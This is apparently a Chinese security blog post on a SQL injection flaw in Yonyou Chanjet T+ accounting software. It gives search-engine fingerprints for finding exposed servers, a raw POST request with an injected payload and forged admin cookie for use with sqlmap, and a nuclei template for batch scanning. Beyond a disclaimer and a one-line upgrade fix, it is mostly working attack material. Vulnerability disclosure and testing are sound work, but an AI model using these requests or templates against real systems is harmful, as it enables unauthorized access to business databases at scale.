(附nuclei 批量验证文件)用友 畅捷通T+ MultiCompanyController SQL注入漏洞
声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
1、漏洞简介
用友 畅捷通T+ MultiCompanyController 存在SQL注入漏洞,执行sql语句,获取数据库信息。
2、资产指纹
fofa:app=“畅捷通-TPlus”
hunter: app.name=“畅捷通 T+”
3、漏洞复现
使用以下数据包通过sqlmap进行测试
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Content-Length: 53
Content-Type: text/plain
Cookie: ASP.NET_SessionId=; sid=admin
Accept-Encoding: gzip, deflate
{"accNum": "6'", "functionTag": "SYS0104", "url": ""}
4、nuclei yaml文件
id: chanjettplus-sqli
info:
name: chanjettplus - SQL Injection
author: XXX
severity: critical
description: |
There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
reference:
- https://stack.chaitin.com/vuldb/detail?id=f4ae9a80-58c7-4a5c-a463-ae4e40605880
tags: chanjettplus,sqli
http:
- raw:
- |
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
Cookie: ASP.NET_SessionId=; sid=admin
{"accNum": "6'", "functionTag": "SYS0104", "url": ""}
matchers:
- type: word
words:
- "附近有语法错误"
part: body
修复方式
关注用友官网,及时升级至最新版本。